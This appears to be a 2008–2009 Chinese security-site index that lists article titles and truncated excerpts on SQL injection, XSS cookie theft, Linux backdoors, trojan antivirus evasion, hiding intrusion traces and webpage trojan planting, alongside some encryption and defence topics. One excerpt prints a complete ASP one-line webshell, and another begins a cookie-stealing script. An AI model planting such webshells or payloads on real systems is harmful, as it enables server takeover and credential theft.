不用引号的字符注入和XSS
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 35
不用引号的字符注入和XSS 在字符型填字游戏中,'和"往往是决定能否跳出约束进行攻击的关键,于是出现鸟转义字符 ,可以把...
linux下留本地后门的两个方法
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 45
linux下留本地后门的两个方法 方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# l...
计算机安全主要包括什么
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 39
社会工程学入侵三步走 大家一定知道超级黑客凯文·米特尼克吧,深为他的社会工程学所折服,美国国防部、五角大楼、中央情报局、北美防空系统……都...
Linux系统如何关闭防火墙
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 40
linux入侵踪迹隐藏攻略 前言:被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自...
关于趋势科技等网站被攻击的分析
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 39
关于趋势科技等网站被攻击的分析 一. 首先在网上找到了这次攻击的新闻报道http://www.nsfocus.net/news/6697 ...
实战讲解跨站入侵攻击
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 37
实战讲解跨站入侵攻击 很多时候在企业网络安全,特别是服务器上数据库安全防范方面需要特别注意,弥补所有漏洞,减少因设置不当带来的入侵事件的发...
黑客入侵网络的五十种方法
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 37
黑客入侵网络的五十种方法 现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让...
CSRF—攻击与防御
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 35
CSRF—攻击与防御 0x01 什么是CSRF攻击CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF)...
弹窗口的流氓软件核心代码
2008-12-27 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 57
弹窗口的流氓软件核心代码ps:请勿用于非法用途,仅供技术研究之用。 by:yunshu 这个东西的主要功能就是去网上一个URL读取配置文件...
木马免杀绝招以及常用的修改方法
2009-03-07 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 39
木马免杀绝招以及常用的修改方法 常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 ......
asp+js 偷取Cookies源代码
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 35
asp+js 偷取Cookies源代码偷取Cookie,通过以下脚本引入一个js,document.write("<scr...
linux下mysql 5.x得到root密码后的另外一种利用方式
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 48
linux下mysql 5.x得到root密码后的另外一种利用方式Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题,m...
FCKeditor JSP版漏洞
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 38
FCKeditor JSP版漏洞FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/...
SQL注入及危害、防御手段的处理方法
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 39
phpMyAdmin table参数SQL注入漏洞影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin p...
mysql 读取文件的几种方式及应用
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 45
mysql 读取文件的几种方式及应用章出处:C.R.S.T 作者:sai52[B.H.S.T] blog:www.sai52.com 今天...
利用windows自带功能做永不被查杀的下载者(超小体积)!
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 40
利用windows自带功能做永不被查杀的下载者(超小体积)!用windows自带功能做永不被查杀,超小体积的下载者! 利用windows自...
判断数据库web是否分离的技巧
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 44
判断数据库web是否分离的技巧得到客户端主机名: select host_name(); 得到服务端主机名: select @@serve...
一句话木马(asp,php) 总结篇
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 38
一句话木马(asp,php) 总结篇asp一句话 <%execute(request("1"))%> ph...
asp php XSS获取cookie的代码
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 38
asp php XSS获取cookie的代码<script>document.write('<img src="...
冰河暗涌防不胜防 BIOS下实现的Telnet后门
2009-04-20 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 35
冰河暗涌防不胜防 BIOS下实现的Telnet后门该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着...
网页挂马详细步骤教程
2009-04-30 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 39
网页挂马详细步骤教程其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,...
无需攻击lsass进程即可解密系统管理员密码
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 196
无需攻击lsass进程即可解密系统管理员密码 Lsass.exe是Windows系统中必不可少的一个进程,属于微软Windows系统中安全...
企业加密系统应用综述之常用的加密算法介绍
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 188
企业加密系统应用综述之常用的加密算法介绍 常见的加密算法可以分成三类,对称加密算法,非对称加密算法和Hash算法。对称加密指加密和解密使用...
另类破解灰鸽子连接密码(图)
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 195
另类破解灰鸽子连接密码(图) 灰鸽子对大家来说并不陌生吧,他强大的功能都令各位黑友爱不释手,今天主要来讨论一下,如何破解灰鸽子的连接密码。...
ACProtect Professional 1.3C 主程序脱壳(1)(图)
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 586
ACProtect Professional 1.3C 主程序脱壳(1)(图) 脱壳过程感觉与Unpacking Saga的那个Unpac...
Skype的数字身份识别和加密
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 200
Skype的数字身份识别和加密 为了实现这些目标,Skype向每位Skype用户发放了一份“数字证书”,任何Sky...
Imail密码加密算法及VBS实现
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 208
Imail密码加密算法及VBS实现 Imail的所有邮局信息,比如用户,密码都实际上都是存储在计算机注册表当中的,所以只需要打开注册表就可...
网络加、解密的技术应用
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 214
网络加、解密的技术应用 进入信息和网络化的时代以来,计算机正在我们的工作和生活中扮演着日益重要的角色。越来越多的用户通过计算机来获取信息、...
用OllyDbg手脱RLPack V1.17加壳的DLL
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 195
用OllyDbg手脱RLPack V1.17加壳的DLL 一.OEP通常压缩壳加壳的DLL找OEP是比较简单的DLL卸载时会再次从EP处运...
给windows目录加密码防止恶意软件入侵
2008-10-08 00:00 | 分类:网络安全 | 评论:0 次 | 浏览: 201
给windows目录加密码防止恶意软件入侵 Windows系统目录是Windows操作系统的重要目录,当我们访问这个目录时,系统会提示你这...